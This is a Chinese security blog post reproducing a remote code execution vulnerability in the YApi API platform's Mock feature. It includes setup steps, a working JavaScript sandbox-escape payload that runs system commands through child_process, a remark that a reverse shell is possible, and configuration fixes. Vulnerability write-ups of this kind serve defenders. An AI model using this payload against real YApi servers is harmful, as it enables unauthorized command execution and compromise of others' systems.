YApi Mock功能远程代码执行漏洞复现

admin

140415
文章

117
评论

2021年7月16日01:01:50评论162 views字数 1216阅读4分3秒阅读模式

上方蓝色字体关注我们，一起学安全！

作者：蔷薇@Timeline Sec

本文字数：690

阅读时长：3～4min

声明：请勿用作违法用途，否则后果自负

0x01 简介

YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目，使用mock数据/脚本作为中间交互层，为前端后台开发与测试人员提供更优雅的接口管理服务，该系统被国内较多知名互联网企业所采用。

0x02 漏洞概述

近日，网络上爆出 YApi 的远程代码执行 0day 漏洞，漏洞等级为高危，且正被广泛利用。攻击者通过注册用户后，即可通过Mock功能远程执行任意代码。

因为大量用户使用YApi的默认配置并允许从外部网络访问YApi服务，导致攻击者注册用户后，即可通过 Mock功能远程执行任意代码。

0x03 影响版本

YApi7月7日前版本

0x04 环境搭建

docker部署：

https://github.com/Ryan-Miao/docker-yapi

0x05 漏洞复现

1.注册用户

2.添加项目

YApi Mock功能远程代码执行漏洞复现

访问/add-project

YApi Mock功能远程代码执行漏洞复现

3.添加接口

4.设置mock

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ifconfig").toString()

5.查看Mock地址

6.访问Mock地址

命令成功执行：

7.同理，也可利用命令反弹shell

0x06 修复方式

1、关闭YApi用户注册功能；修改完成后，重启YApi服务

在"config.json"添加"closeRegister:true"配置项：{  "port": "*****",  "closeRegister":true}

2、暂时关闭mock功能（需要修改YApi代码）

在"config.json"中添加"mock: false"；

"exts/yapi-plugin-andvanced-mock/server.js"中找到

if (caseData&&caseData.case_enable{...}

在其上方添加

if(!yapi.WEBCONFIG.mock) {return false;}

3、白名单限制；

安全组配置白名单访问，或者使用NGINX进行代理，限制白名单IP访问；

4、检查用户列表，删除恶意不明用户；并删除恶意不明用户创建的接口及mock脚本。

阅读原文看更多复现文章

Timeline Sec 团队

安全路上，与你并肩前行

本文始发于微信公众号（Timeline Sec）：YApi Mock功能远程代码执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

YApi Mock功能远程代码执行漏洞复现

DeFiVulnLabs靶场全系列详解（三十九）错误的删除数组方式导致数据泄露

伪装成VPN安装程序银狐最新免杀样本分析

github密码泄露导致的越权漏洞

HTB Environment 渗透测试全流程：信息收集到提权完整实战

某报表漏洞分析

打靶日记 Moria1.1

Druid & Swagger 未授权访问简单配置

PXA Stealer最新攻击活动样本分析

0038.我如何在顶级漏洞赏金计划中找到我最喜欢的漏洞

【CTFer成长之路】零元购逻辑漏洞

发表评论

在线咨询

微信